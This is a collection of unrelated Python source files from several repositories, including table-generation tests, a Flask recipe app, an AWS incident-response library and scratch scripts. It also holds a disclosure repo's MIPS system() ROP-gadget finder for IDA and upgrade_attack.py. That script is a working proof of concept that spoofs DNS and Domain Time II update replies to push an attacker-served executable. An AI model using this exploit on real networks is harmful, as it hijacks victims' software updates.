'<table><tr><th>header1</th><th>header2</th><th>header3</th></tr><tr><td><foo1></td><td>&bar1</td><td>"baz1</td></tr><tr><td><foo2></td><td>&bar2</td><td>"baz2</td></tr><tr><td> </td><td>0</td><td> </td></tr></table>',
gen.generate( { 'encodes': 'a&"' } ),
"requested chars are encoded"
)
if __name__ == '__main__':
unittest.main()
```
#### File: Spreadsheet-HTML-python/t/13-caption.py
```python
import unittest
from Spreadsheet.HTML import Table
class TestCaption(unittest.TestCase):
def test_caption(self):
data = [
[ 'a', 'b', 'c' ],
[ '1', '2', '3' ],
[ '4', '5', '6' ],
]
gen = Table( { 'data': data, 'caption': "My Table" } )
self.assertEqual(
'<table><caption>My Table</caption><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate(),
"caption present from generate()"
)
gen = Table( { 'data': data, 'caption': { "My Table": { 'key': 'value' } } } )
self.assertEqual(
'<table><caption key="value">My Table</caption><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate(),
"caption present from generate()"
)
self.assertEqual(
'<table><caption key="value">My Table</caption><thead><tr><th>a</th><th>b</th><th>c</th></tr></thead><tfoot><tr><td>4</td><td>5</td><td>6</td></tr></tfoot><tbody><tr><td>1</td><td>2</td><td>3</td></tr></tbody></table>',
gen.generate( { 'tgroups': 2 } ),
"caption present from generate() with tgroups"
)
self.assertEqual(
'<table><caption>0</caption><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'caption': 0 } ),
"caption can be overriden"
)
if __name__ == '__main__':
unittest.main()
```
|
{
"source": "jeffathammnet/recipes_flask",
"score": 3
}
|
#### File: jeffathammnet/recipes_flask/app.py
```python
from flask import Flask, render_template, request, flash, redirect, url_for, session
import redis
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy import or_
import uuid
from cfg import config
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = config.SQLALCHEMY_DATABASE_URI
app.config['SECRET_KEY'] = config.SECRET_KEY
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = config.SQLALCHEMY_TRACK_MODIFICATIONS
db = SQLAlchemy(app)
r = redis.Redis(host=config.REDIS_HOST, port=config.REDIS_PORT, db=0)
class Recipes(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(80), unique=True, nullable=False)
healthy = db.Column(db.Boolean(), nullable=False)
prepTime = db.Column(db.Integer, nullable=False)
cookTime = db.Column(db.Integer, nullable=False)
servings = db.Column(db.Integer, nullable=False)
ingredients = db.Column(db.String(10000), nullable=False)
directions = db.Column(db.String(10000), nullable=False)
def __repr__(self):
return '<Recipe %r>' % self.name
@app.before_request
def before_request_callback():
#Create a session ID for the user
if not "uid" in session:
session['uid'] = uuid.uuid1().int
@app.route("/")
def index():
return redirect(url_for("view_get"))
@app.route("/new")
def new_get():
'''Create a new recipe entry
'''
return render_template("new.html")
@app.route("/new", methods=["POST"])
def new_post():
'''Add new recipe entry to DB
'''
new_recipe = Recipes(
name = request.form.get('title'),
healthy = True if request.form.get('healthy-bool') else False,
prepTime = int(request.form['prep-time']) if request.form.get('prep-time').isnumeric() else 0,
cookTime = int(request.form['cook-time']) if request.form.get('cook-time').isnumeric() else 0,
servings = int(request.form['servings']) if request.form.get('servings').isnumeric() else 0,
ingredients = request.form.get('ingredients'),
directions = request.form.get('directions')
)
db.session.add(new_recipe)
db.session.commit()
flash("Recipe addedd successfully")
return redirect(url_for("new_get"))
@app.route("/view")
def view_get():
'''View all recipes
'''
j2_data = {'recipes': Recipes.query.all() }
return render_template("view.html", j2_data=j2_data)
@app.route("/view/<int:recipeID>")
def view_id_get(recipeID):
'''View specific recipe
'''
recipe = Recipes.query.filter(Recipes.id == recipeID).first()
j2_data = {'single_recipe':
{
"recipe": recipe,
}
}
return render_template("view.html", j2_data=j2_data)
@app.route("/view", methods=["POST"])
def view_post():
'''Add new recipe entry to DB
'''
if request.form.get("delete"):
#Delete action
Recipes.query.filter(Recipes.id==request.form.get("recipeID")).delete()
db.session.commit()
flash("Recipe deleted successfully")
return redirect(url_for("view_get"))
else:
#Update Recipe
recipe = Recipes.query.filter(Recipes.id==request.form.get("recipeID")).first()
recipe.name = request.form.get('title')
recipe.healthy = True if request.form.get('healthy-bool') else False
recipe.prepTime = int(request.form['prep-time']) if request.form.get('prep-time').isnumeric() else 0
recipe.cookTime = int(request.form['cook-time']) if request.form.get('cook-time').isnumeric() else 0
recipe.servings = int(request.form['servings']) if request.form.get('servings').isnumeric() else 0
recipe.ingredients = request.form.get('ingredients')
recipe.directions = request.form.get('directions')
db.session.commit()
flash("Recipe updated successfully")
return redirect(url_for("view_get")+"/"+request.form["recipeID"])
@app.route("/menu", methods=["GET"])
def menu_get():
'''View menu for current user session
'''
j2_data = {}
#Validate user has items in menu
if r.llen(session['uid']) > 0:
j2_data['recipes'] = []
#Query for menu item details
for menuID in r.lrange(session['uid'],0,-1):
recipe = Recipes.query.filter(Recipes.id==int(menuID)).first()
#Append if exists.
if recipe:
j2_data['recipes'].append(recipe)
return render_template("menu.html", j2_data=j2_data)
@app.route("/menu/shopping-list", methods=["GET"])
def menu_shopping_list_get():
'''View menu for current user session
'''
j2_data = {}
#Validate user has items in menu
if r.llen(session['uid']) > 0:
j2_data['shopping_list'] = []
#Query for menu item details
for menuID in r.lrange(session['uid'],0,-1):
#Add each ingredient to shopping list
j2_data['shopping_list'] += Recipes.query.filter(Recipes.id==int(menuID)).first().ingredients.split("\r\n")
return render_template("menu.html", j2_data=j2_data)
@app.route("/menu", methods=["POST"])
def menu_post():
'''Update menu for current user session
'''
#Delete all items from menu
if request.form.get('reset_menu'):
r.delete(session['uid'])
flash("Menu has been cleared")
#Remove 1 occurence of menu item form list
elif request.form.get('remove_menu_item'):
r.lrem(session['uid'],1, request.form['remove_menu_item'])
#Add random items to menu
elif request.form.get('add_random_count'):
add_random_count = int(request.form.get('add_random_count', 0))
found_count = 0
loop_count = 0
#Search up to 10 times to find unique number of menu items requested.
while found_count < add_random_count and loop_count <= 10:
random_recipes = Recipes.query.order_by(db.func.random()).limit(int(request.form['add_random_count'])).all()
for recipe in random_recipes:
if not bytes(str(recipe.id), encoding="utf8") in r.lrange(session['uid'],0,-1):
r.lpush(session['uid'], recipe.id)
found_count += 1
loop_count += 1
if loop_count > 10:
flash("Not able to find enough recipes")
flash("Random recipes added")
#Add single item to menu
else:
if not bytes(str(request.form['recipeID']), encoding="utf8") in r.lrange(session['uid'],0,-1):
r.lpush(session['uid'], int(request.form.get('recipeID')))
else:
flash("Recipe already added to menu.")
return redirect(url_for("menu_get"))
@app.route("/search")
def search_get():
'''Search recipe title and ingrediants to find a match
'''
j2_data = {}
query = request.args.get('q')
search_result = j2_data['recipes'] = Recipes.query.filter(or_(Recipes.name.like(f"%{query}%"),Recipes.ingredients.like(f"%{query}%"))).all()
if not search_result:
flash("No items found")
return render_template("view.html", j2_data=j2_data)
if __name__ == '__main__':
app.run(host='0.0.0.0', debug=True, port=8443, ssl_context=(config.SSL_CERTIFICATE, config.SSL_KEY))
```
|
{
"source": "jeffa/window-viewport",
"score": 3
}
|
#### File: window-viewport/t/01-load.py
```python
import unittest
from window.viewport import viewport
class TestLoad(unittest.TestCase):
def test_defaults(self):
w2v = viewport()
self.assertIsInstance( w2v, viewport, 'object is instance of class' )
if __name__ == '__main__':
unittest.main()
```
#### File: window-viewport/t/02-run.py
```python
import unittest
from math import sin
#import window.viewport
from window.viewport import viewport
class TestLoad(unittest.TestCase):
def test_defaults(self):
w2v = viewport( Wb = 0, Wt = 1, Wl = 0, Wr = 1, Vb = 9, Vt = 0, Vl = 0, Vr = 9 )
self.assertEqual( w2v.Dx(.5), 4.5, 'correct Dx()' )
self.assertEqual( int(w2v.Dy(.6)), 3, 'correct Dy()' )
x = 0
y = sin(x)
self.assertEqual( int(w2v.Dx(x)), 0, 'correct Dx() sin wave 1/5' )
self.assertEqual( int(w2v.Dy(y)), 9, 'correct Dy() sin wave 1/5' )
x = 0.1
y = sin(x)
self.assertEqual( int(w2v.Dx(x)), 0, 'correct Dx() sin wave 2/5' )
self.assertEqual( int(w2v.Dy(y)), 8, 'correct Dy() sin wave 2/5' )
x = 0.2
y = sin(x)
self.assertEqual( int(w2v.Dx(x)), 1, 'correct Dx() sin wave 3/5' )
self.assertEqual( int(w2v.Dy(y)), 7, 'correct Dy() sin wave 3/5' )
x = 0.3
y = sin(x)
self.assertEqual( int(w2v.Dx(x)), 2, 'correct Dx() sin wave 4/5' )
self.assertEqual( int(w2v.Dy(y)), 6, 'correct Dy() sin wave 4/5' )
x = 0.4
y = sin(x)
self.assertEqual( int(w2v.Dx(x)), 3, 'correct Dx() sin wave 5/5' )
self.assertEqual( int(w2v.Dy(y)), 5, 'correct Dy() sin wave 5/5' )
if __name__ == '__main__':
unittest.main()
```
|
{
"source": "jeffb4/aws_ir",
"score": 2
}
|
#### File: aws_ir/libs/case.py
```python
import logging
import os
import random
import sys
from datetime import datetime
import aws_ir
from aws_ir.libs import aws
from aws_ir.libs import connection
from aws_ir.libs import inventory
from aws_ir.libs import s3bucket
logger = logging.getLogger(__name__)
class Case(object):
"""Takes case number and examiner cidr."""
def __init__(
self,
case_number=None,
examiner_cidr_range='0.0.0.0/0',
case_bucket=None,
profile='default',
case_type=None
):
self.profile = profile
self.ec2_client = connection.Connection(
type='client',
service='ec2',
region='us-west-2',
profile=self.profile
)
self.s3_resource = connection.Connection(
type='resource',
service='s3',
region='us-west-2',
profile=self.profile
)
if case_number:
self.case_number = case_number
else:
self.case_number = self._generate_case_number()
if case_bucket:
self.case_bucket = case_bucket
else:
self.case_bucket = self._setup_bucket(region='us-west-2')
self.examiner_cidr_range = examiner_cidr_range
def prep_aws_connections(self):
"""Get all the required information before doing the mitigation. """
logger.info("Initial connection to AmazonWebServices made.")
self.amazon = aws.AmazonWebServices(
self.ec2_client
)
self.available_regions = self.amazon.regions
logger.info(("Inventory AWS Regions Complete {region_count} "
"found.".format(region_count=len(self.amazon.regions))))
self.availability_zones = self.amazon.availability_zones
logger.info(
(
"Inventory Availability Zones Complete {zone_count} "
"found.".format(zone_count=len(self.amazon.availability_zones))
)
)
logger.info(("Beginning inventory of resources world wide. "
"This might take a minute..."))
self.aws_inventory = inventory.Inventory(
self.ec2_client,
self.available_regions
)
logger.info(("Inventory complete. Proceeding to resource "
"identification."))
self.inventory = self.aws_inventory.inventory
def _rename_log_file(self, case_number, resource_id, base_dir="/tmp"):
"""Move all log files to standard naming format"""
try:
os.rename(
("{base_dir}/{case_number}-aws_ir.log").format(
base_dir=base_dir,
case_number=case_number,
),
("{base_dir}/{case_number}-{resource_id}-aws_ir.log").format(
base_dir=base_dir,
case_number=case_number,
resource_id=resource_id
)
)
return True
except Exception:
return False
def copy_logs_to_s3(self, base_dir="/tmp"):
"""Convinience function to put all case logs to s3 at the end"""
case_bucket = self._get_case_bucket()
logs = self._get_case_logs(base_dir=base_dir)
for log in logs:
case_bucket.upload_file(
"{base_dir}/{log}".format(
base_dir=base_dir,
log=log
),
log
)
def teardown(self, region, resource_id):
"""Any final post mitigation steps universal to all plans. """
try:
aws_ir.wrap_log_file(self.case_number)
self._rename_log_file(self.case_number, resource_id)
self.copy_logs_to_s3()
processing_end_messaging = (
"""Processing complete for {case_number}\n"""
"""Artifacts stored in s3://{case_bucket}"""
).format(case_number=self.case_number,
case_bucket=self.case_bucket)
print(processing_end_messaging)
sys.exit(0)
except Exception as e:
logger.error(
("Error uploading case logs for {case_number} to s3 "
"bucket {case_bucket}: {ex}".format(
case_number=self.case_number,
case_bucket=self.case_bucket,
ex=e)
)
)
sys.exit(1)
def _get_case_logs(self, base_dir="/tmp"):
"""Enumerates all case logs based on case number from system /tmp"""
files = []
for file in os.listdir(base_dir):
if file.startswith(self.case_number):
files.append(file)
return files
def _setup_bucket(self, region):
"""Wrap s3 find or create in object"""
client = connection.Connection(
type='client',
service='s3'
).connect()
bucket_name = s3bucket.CaseBucket(
self.case_number,
region,
client,
self.s3_resource
).bucket.name
return bucket_name
def _get_case_bucket(self):
return self.s3_resource.connect().Bucket(self.case_bucket)
def _generate_case_number(self):
return datetime.utcnow().strftime(
'cr-%y-%m%d%H-{0:04x}'
).format(
random.randint(0, 2 ** 16)
)
```
#### File: aws_ir/libs/s3bucket.py
```python
import uuid
"""Class to create the cases s3 bucket for asset storage"""
class CaseBucket(object):
def __init__(self, case_number, region, client, resource):
self.region = region
self.case_number = case_number
self.client = client
self.s3 = resource.connect()
self.bucket = self.find_or_create_by()
def find_or_create_by(self):
bucket = self._locate_bucket()
if bucket is not None:
return bucket
else:
self.bucket_name = self._generate_name()
bucket = self._create_s3_bucket()
self._set_acls(self.bucket_name)
self._set_tags(self.bucket_name)
self._set_versioning(self.bucket_name)
return bucket
pass
def cleanup_empty_buckets(self):
buckets = self.client.list_buckets()
for bucket in buckets['Buckets']:
if str(bucket['Name']).find('cloud-response') != -1:
try:
self.client.delete_bucket(Bucket=bucket['Name'])
print(bucket['Name'])
except Exception:
pass
def _generate_name(self):
bucket_name = 'cloud-response-' + str(uuid.uuid4()).replace('-', '')
return bucket_name
def _create_s3_bucket(self):
# the if statement is to prevent
# a fun little bug https://github.com/boto/boto3/issues/125
if self.region == 'us-east-1':
bucket = self.s3.create_bucket(
Bucket=self.bucket_name
)
else:
bucket = self.s3.create_bucket(
Bucket=self.bucket_name,
CreateBucketConfiguration={
'LocationConstraint': self.region
}
)
return bucket
def _set_acls(self, bucket_name):
self.s3.BucketAcl(bucket_name).put(ACL='bucket-owner-full-control')
def _set_tags(self, bucket_name):
self.client.put_bucket_tagging(
Bucket=bucket_name,
Tagging=dict(
TagSet=[
dict(
Key='cr-case-number',
Value=self.case_number
)
]
)
)
def _set_versioning(self, bucket_name):
self.client.put_bucket_versioning(
Bucket=bucket_name,
VersioningConfiguration=dict(
MFADelete='Disabled',
Status='Enabled'
)
)
def _locate_bucket(self):
buckets = self.s3.buckets.all()
for bucket in buckets:
if bucket.name.startswith("cloud-response-"):
tags = self._get_bucket_tags(bucket.name)
if self._check_tags(tags):
case_bucket = bucket
return case_bucket
else:
return None
else:
pass
def _get_bucket_tags(self, bucket):
try:
s3 = self.client
response = s3.get_bucket_tagging(
Bucket=bucket,
)
except Exception:
response = None
return response
def _check_tags(self, tag_object):
if tag_object is None:
return False
elif tag_object.get('TagSet', None) is not None:
for tag in tag_object['TagSet']:
if tag['Value'] == self.case_number:
return True
else:
return False
else:
return False
```
#### File: aws_ir/plans/key.py
```python
import logging
from aws_ir.libs import compromised
from aws_ir.libs import connection
from aws_ir.libs import plugin
from aws_ir.plans import steps_to_list
logger = logging.getLogger(__name__)
"""Compromise class for Key Compromise Procedure"""
class Compromise(object):
def __init__(
self,
examiner_cidr_range='0.0.0.0/0',
compromised_access_key_id=None,
region='us-west-2',
case=None,
steps=None
):
if compromised_access_key_id is None:
raise ValueError(
'Must specify an access_key_id for the compromised key.'
)
self.case_type = 'Key'
self.compromised_access_key_id = compromised_access_key_id
self.region = region
self.case = case
self.plugins = plugin.Core()
self.steps = steps_to_list(steps)
def mitigate(self):
"""Any steps that run as part of key compromises."""
access_key = self.compromised_access_key_id
compromised_resource = compromised.CompromisedMetadata(
compromised_object_inventory={
'access_key_id': access_key,
'region': self.region
},
case_number=self.case.case_number,
type_of_compromise='key_compromise'
).data()
session = connection.Connection(
type='session',
region='us-west-2'
).connect()
logger.info("Attempting key disable.")
for action in self.steps:
step = self.plugins.source.load_plugin(action)
step.Plugin(
boto_session=session,
compromised_resource=compromised_resource,
dry_run=False
)
```
#### File: aws_ir/tests/test_logging.py
```python
import os
import aws_ir
from aws_ir import TimesketchLogger
import logging
CASE_NUMBER = "cr-17-000001-2d2d"
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
LOG_FILE = "{0}/{1}-aws_ir.log".format(BASE_DIR, CASE_NUMBER)
class TestLogging(object):
def test_logging(self):
logger = logging.getLogger('aws_ir')
# ensure custom logger class is in place
assert logger.__class__ == TimesketchLogger
# ensure that null log handler is in place by default
assert len(logger.handlers) == 1
assert logger.handlers[0].__class__ == aws_ir.NullHandler
# setup stream handler and ensure the object was created
aws_ir.set_stream_logger(level=logging.INFO)
assert len(logger.handlers) == 2
assert logger.handlers[1].__class__ == logging.StreamHandler
# setup file handler and ensure the object was created
aws_ir.set_file_logger(
CASE_NUMBER, base_dir=BASE_DIR,
level=logging.INFO
)
assert len(logger.handlers) == 3
assert logger.handlers[2].__class__ == logging.FileHandler
# test log file is created
aws_ir.wrap_log_file(CASE_NUMBER, base_dir=BASE_DIR)
logger.info("test of file log")
assert os.path.isfile(LOG_FILE) is True
aws_ir.wrap_log_file(CASE_NUMBER, base_dir=BASE_DIR)
# check file contents
with open(LOG_FILE, 'r') as f:
lines = f.readlines()
assert "[" in lines[0]
assert "test of file log" in lines[1]
assert "]" in lines[-1]
def teardown_method(self, method):
# clear all but the aws_ir.NullHandler
logger = logging.getLogger('aws_ir')
for handler in logger.handlers:
if handler.__class__ != aws_ir.NullHandler:
logger.removeHandler(handler)
# cleanup the log file if it was created
if os.path.isfile(LOG_FILE):
os.remove(LOG_FILE)
```
|
{
"source": "jeffb4real/scripts",
"score": 2
}
|
#### File: jeffb4real/scripts/clip_naming_example.py
```python
import os
def run_test(root_dir, mlp_in, clip_list):
# We've successfully passed "by position" (section 1.3.1 on the confluence page).
# But if you notice that sometimes you need to pass certain args and other times not pass them,
# then consider using the pass by "keyword arguments" approach (which can include default values
# for keyword args that aren't passed to the function).
print '\nmlp_in: ', mlp_in, '\n'
for clip in (clip_list):
full_clip_name = os.path.join(root_dir, clip)
print full_clip_name
print "\n\n"
# An exercise in filename mangling
for clip in (clip_list):
full_clip_name = os.path.join(root_dir, clip)
# head will be the path; tail is all the non-path stuff
head, tail = os.path.split(full_clip_name)
name, ext = os.path.splitext(tail)
print head + '/' + name + '_reconnected.mlp'
root_dir = 'c:/temp'
mlp_in = 'ABC.mlp'
clip_list = ('clipA', 'clipB', 'clipC')
# I think no need to defined the following explicitly, as the names can be formed based on mlp_in
# connected_mlp_out =
# decoded_wav_out =
run_test(root_dir, mlp_in, clip_list)
```
#### File: jeffb4real/scripts/function_decorators2.py
```python
def outer_func(msg):
def inner_func():
print msg
return inner_func
hi_func = outer_func('Hi')
bye_func = outer_func('Bye')
hi_func()
bye_func()
```
#### File: jeffb4real/scripts/misc.py
```python
import os
import sys
from sys import version_info
import time
import re
# Function decorators
def p_decorate(func):
def func_wrapper(*args, **kwargs):
return "<p>{0}</p>".format(func(*args, **kwargs))
return func_wrapper
class Person(object):
def __init__(self):
print
self.name = "John"
self.family = "Doe"
@p_decorate
def get_fullname(self):
return self.name+" "+self.family
def do_stuff():
return "{0}"
my_person = Person()
my_person.name = 'Jerry'
#print my_person.get_fullname()
#print
#print do_stuff()
py3 = version_info[0] > 2 # Creates boolean value for test that Python major version > 2
print py3 == 0,
print
if py3:
sometext = str(input('Please enter some text: '))
else:
sometext = str(raw_input('Please enter some text: '))
print 'Hello, {}!'.format(sometext)
#print int(sometext)*int(sometext)
foo=3
bar='help'
print foo
print bar
print
x='there are %d types of people in the world' % 10
print x
sys.exit()
#re.match(var, 'hell')
#print match.group(0)
#print match.group(1)
#print match.group(2)
# OOPS: inheritance, polymorphism (compile time: overloading; run time: override), encapsulation, abstraction)
# JAVA: == is comparison operator, compares reference/address; .equal compares the contents, e.g. string vs. string
```
#### File: jeffb4real/scripts/print_module_info.py
```python
import os, sys, re, subprocess, platform, shutil, argparse, test, xml, time, urllib2, getopt
import importlib
# From Django tutorial05
from django.test import TestCase
def print_modules(module_list):
for mod in module_list:
print '------------'
print mod
print '------------'
module = importlib.import_module(mod, package=None)
print str(dir(module)).replace("'", '')
print
# Print string names
print '------------'
print 'String'
print '------------'
print str(dir('abc')).replace("'", '')
print
# Print list names
print '------------'
print 'List'
print '------------'
print str(dir([1,2,3])).replace("'", '')
print
# Print list names
print '------------'
print 'os.path'
print '------------'
print str(dir(os.path)).replace("'", '')
print
# Use split() on a string to create a list (the lazy way!)
module_list = 'os sys re subprocess platform shutil argparse test xml time urllib2 getopt'.split()
print_modules (module_list)
#print_modules('TestCase')
```
#### File: jeffb4real/scripts/test1.py
```python
import pytest
@pytest.mark.parametrize(("a,b"), [(1,1), (1,1), (1,2)],
ids=["basic", None, "advanced"])
def test_function(a, b):
assert a == b
```
|
{
"source": "jeffb4real/SLHPA-Web-App",
"score": 2
}
|
#### File: mysite/slhpa/dummyview.py
```python
from django.http import HttpResponse
def hello(request):
return HttpResponse("<NAME>. Your database may not be loaded.")
```
#### File: mysite/slhpa/filters.py
```python
import django_filters as filters
from .models import PhotoRecord
class PhotoFilter(filters.FilterSet):
def __init__(self, *args, **kwargs):
super(PhotoFilter, self).__init__(*args, **kwargs)
self.filters['resource_name__contains'].label = "Photo Identifier contains"
class Meta:
model = PhotoRecord
fields = {
"resource_name": ["contains"],
"title": ["contains"],
"description": ["contains"],
"subject": ["contains"],
"year": ["exact"],
# "year": ["exact", "range"],
}
```
|
{
"source": "jeffball55/NotQuite0DayFriday",
"score": 2
}
|
#### File: 2020.06.15-netgear/tools/find_mips_gadget.py
```python
import sys
import os
import idaapi
import idc
MAX_PREVIOUS_SEARCH = 10
def call_xrefs(function_name):
function_address = LocByName(function_name)
for addr in XrefsTo(function_address):
mnem = GetMnem(addr.frm)
# We only care about the calls
if mnem not in ['jalr', 'jr']:
continue
yield addr.frm
def print_gadget(fd, start, end, stack_size):
fd.write("Found gadget (address 0x{:x} buffer $sp+0x{:x})\n".format(start, stack_size))
for address in range(start, end+4, 4):
fd.write("0x{:x}: {}\n".format(address, GetDisasm(address)))
fd.write("\n")
def find_gadget(symbol_name, filename = None):
stack_write_inst = "addiu $a0, $sp,"
required = [
[stack_write_inst],
["la $t9,", "lw $t9,"],
]
disallowed_starts = [
# No calls/branches in our
"jalr", "jr", "b",
# Writing to memory could crash, let's skip it.
# It might be worthwhile to exclude sp here.
"lw", "lh", "lb",
"sw", "sh", "sb",
]
bad_register_writes = [
"a0", "t9",
]
fd = sys.stdout
if filename != None:
fd = open(filename, 'w')
for symbol_call in call_xrefs(symbol_name):
mnem = GetMnem(symbol_call)
found_insts = {}
stack_size = None
first_address = symbol_call
for x in range(4, -MAX_PREVIOUS_SEARCH * 4, -4):
if x == 0:
continue
inst_address = symbol_call+x
if x < 0:
first_address = inst_address
disasm = GetDisasm(inst_address)
for required_inst in required:
if any([x in disasm for x in required_inst]):
found_insts[inst_address] = required_inst
if stack_size == None and disasm.startswith(stack_write_inst):
stack_size = GetOperandValue(inst_address, 2)
break
if inst_address not in found_insts:
if any([disasm.startswith(x) for x in disallowed_starts]):
break
if GetOpnd(inst_address, 0) in bad_register_writes:
break
if len(required) == len(found_insts):
print_gadget(fd, first_address, symbol_call+4, stack_size)
break
if filename != None:
fd.close()
def find_system_gadget(filename = None):
find_gadget("system", filename)
idaapi.autoWait()
find_system_gadget(os.environ.get("OUTPUT_GADGET_NAME"))
if os.environ.get("OUTPUT_GADGET_NAME") != None:
idc.Exit(0)
```
#### File: 2021.04.06-domain-time-2/upgrade-attack/upgrade_attack.py
```python
from multiprocessing import Process
from time import sleep
import argparse
import http.server
import re
import socketserver
import socket
from scapy.all import *
def build_dns_response(query, name):
ip = query[IP]
udp = query[UDP]
dns = query[DNS]
dns_answer = DNSRR(rrname=name, type='A', rclass='IN', ttl=5, rdata=server_ip)
response = IP(src=ip.dst, dst=ip.src)
response /= UDP(sport=udp.dport, dport=udp.sport)
response /= DNS(id=dns.id, qr=1, aa=0, qdcount=1, ancount=1, qd=dns.qd, an=dns_answer)
return response
def parse_dns_query(pkt):
if DNSRR in pkt:
name = pkt[DNSRR].rrname.decode('UTF-8', errors='backslashreplace')
print(f'DNS Response for "{name}" from {pkt[IP].src}')
elif DNSQR in pkt:
name = pkt[DNSQR].qname.decode('UTF-8', errors='backslashreplace')
print(f'DNS Query for "{name}" from {pkt[IP].src}')
for update_domain in update_domains:
if name.startswith(update_domain):
dns_response = build_dns_response(pkt, name)
send(dns_response, iface=sniff_iface)
print(f'[+] Target DNS Query responded to with {server_ip}')
def parse_dt2_pkt(pkt):
ip = pkt[IP]
udp = pkt[UDP]
print(f'DT2 from {ip.src}:{udp.sport} to {ip.dst}:{udp.dport}')
if ip.dst == server_ip:
update_regex = b'[1-5]\\.[0-9]\\..\\.[0-9]*\x00'
if re.search(update_regex, udp.payload.load):
dt2 = udp.payload
update_response = IP(src=ip.dst, dst=ip.src)
update_response /= UDP(sport=udp.dport, dport=udp.sport)
update_response /= update_url.encode('utf-8') + b"\x00"
send(update_response, iface=sniff_iface)
print(f'[+] Responded to target DT2 Update request: {dt2.load}')
def udp_callback(pkt):
if IP not in pkt or UDP not in pkt:
return
udp = pkt[UDP]
try:
if udp.dport == 53 or udp.sport == 53:
parse_dns_query(pkt)
if udp.dport == 9909 or udp.sport == 9909:
parse_dt2_pkt(pkt)
except Exception as e:
print(f'[!] Packet caused exception: {str(e)}')
print(f' {pkt.summary()}')
class CustomHttpRequestHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
# strip extra params for pattern matching
if '?' in self.path:
path = self.path[:self.path.find('?')]
else:
path = self.path
if path.endswith('.exe'):
# serve a demonstration payload
self.path = 'files/calc.exe'
return http.server.SimpleHTTPRequestHandler.do_GET(self)
elif path.endswith('.asp'):
# serve our copy of their update page
#self.path = 'files/registered.asp.html'
self.path = 'files/evaluation.asp.html'
return http.server.SimpleHTTPRequestHandler.do_GET(self)
else:
# Redirect to non-www greyware domain so they serve the content
self.send_response(302)
self.send_header('Location', f'http://greyware.com/{self.path}')
self.end_headers()
return
def serve_http_thread(server_ip, http_port):
http_address = (server_ip, http_port)
custom_http_server = socketserver.TCPServer(http_address, CustomHttpRequestHandler)
print(f'Serving HTTP at {server_ip} on port {http_port}...')
try:
while True:
custom_http_server.handle_request()
except KeyboardInterrupt:
pass
print('HTTP server stopped.')
def recv_udp(server_ip):
"""Keep 9909:UDP open but do nothing; response happens in sniffer."""
udp_address = (server_ip, 9909)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(udp_address)
print(f'Ready for DT2 traffic at {server_ip}')
try:
while True:
_ = s.recv(0x1000)
except KeyboardInterrupt:
pass
if __name__ == "__main__":
parser = argparse.ArgumentParser('upgrade_attack.py', description='Proof of concept MotS on DT2 upgrade')
parser.add_argument('interface', help='Interface to sniff/send on')
parser.add_argument('ip_address', help='IP to serve fake update on')
parser.add_argument('-i', '--http_impersonation', help='Run the HTTP impersonation PoC',
default=False, action='store_true')
parser.add_argument('-p', '--port', help='Port to serve fake update on',
type=int, default=80)
args = parser.parse_args()
sniff_iface = args.interface
server_ip = args.ip_address
http_port = args.port
if http_port == 80:
port_string = ''
else:
port_string = f':{http_port}'
# Legitimate update link example:
# 'https://www.greyware.com/software/domaintime/update/evaluation.asp'
if args.http_impersonation:
# This points to their URL (HTTP), which assumes we can win DNS and HTTP races
update_url = 'http://www.greyware.com/software/domaintime/update/evaluation.asp'
#update_url = 'http://www.greyware.com/software/domaintime/update/registered.asp'
else:
# This points to a URL on our server, not theirs
update_url = f'http://{server_ip}{port_string}/software/domaintime/update/evaluation.asp'
#update_url = f'http://{server_ip}{port_string}/software/domaintime/update/registered.asp'
# The typical update domains (DT2 update domain and web domain)
update_domains = ['update.greyware.com', 'www.greyware.com']
http_child = Process(target=serve_http_thread, args=(server_ip, http_port))
http_child.start()
# Let the HTTP server start up first
sleep(1)
if not http_child.is_alive():
print('Error: HTTP server failed to start correctly, quitting...')
exit(-1)
# listen on 9909:UDP so we don't respond that the port is closed
udp_child = Process(target=recv_udp, args=(server_ip,))
udp_child.start()
sleep(0.1)
if not udp_child.is_alive():
print('Warning: failed to listen on port 9909:UDP; may not respond correctly')
# Removes extra scapy logging on send()
conf.verb = False
print(f'Sniffing for upgrade traffic on interface {sniff_iface}, Press CTRL+C to stop...')
try:
sniff(iface=sniff_iface, prn=udp_callback, filter="udp", store=False)
except Scapy_Exception as e:
print(f'Scapy Exception occurred: {str(e)}')
print(f'Error: Sniffing failed, check you\'re on the right interface and run with sudo.')
http_child.terminate()
http_child.join()
udp_child.terminate()
udp_child.join()
print('Done.')
```
|
{
"source": "jeffballard/NewsBlur",
"score": 2
}
|
#### File: NewsBlur/utils/twitter_fetcher.py
```python
import re
import datetime
import tweepy
import dateutil.parser
from django.conf import settings
from django.utils import feedgenerator
from django.utils.html import linebreaks
from django.utils.dateformat import DateFormat
from apps.social.models import MSocialServices
from apps.reader.models import UserSubscription
from utils import log as logging
class TwitterFetcher:
def __init__(self, feed, options=None):
self.feed = feed
self.options = options or {}
def fetch(self, address=None):
if not address:
address = self.feed.feed_address
self.address = address
twitter_user = None
username = self.extract_username()
if not username:
return
twitter_user = self.fetch_user(username)
if not twitter_user:
return
tweets = self.user_timeline(twitter_user)
data = {}
data['title'] = "%s on Twitter" % username
data['link'] = "https://twitter.com/%s" % username
data['description'] = "%s on Twitter" % username
data['lastBuildDate'] = datetime.datetime.utcnow()
data['generator'] = 'NewsBlur Twitter API Decrapifier - %s' % settings.NEWSBLUR_URL
data['docs'] = None
data['feed_url'] = address
rss = feedgenerator.Atom1Feed(**data)
for tweet in tweets:
story_data = self.tweet_story(tweet.__dict__)
rss.add_item(**story_data)
return rss.writeString('utf-8')
def extract_username(self):
username = None
try:
username_groups = re.search('twitter.com/(\w+)/?', self.address)
if not username_groups:
return
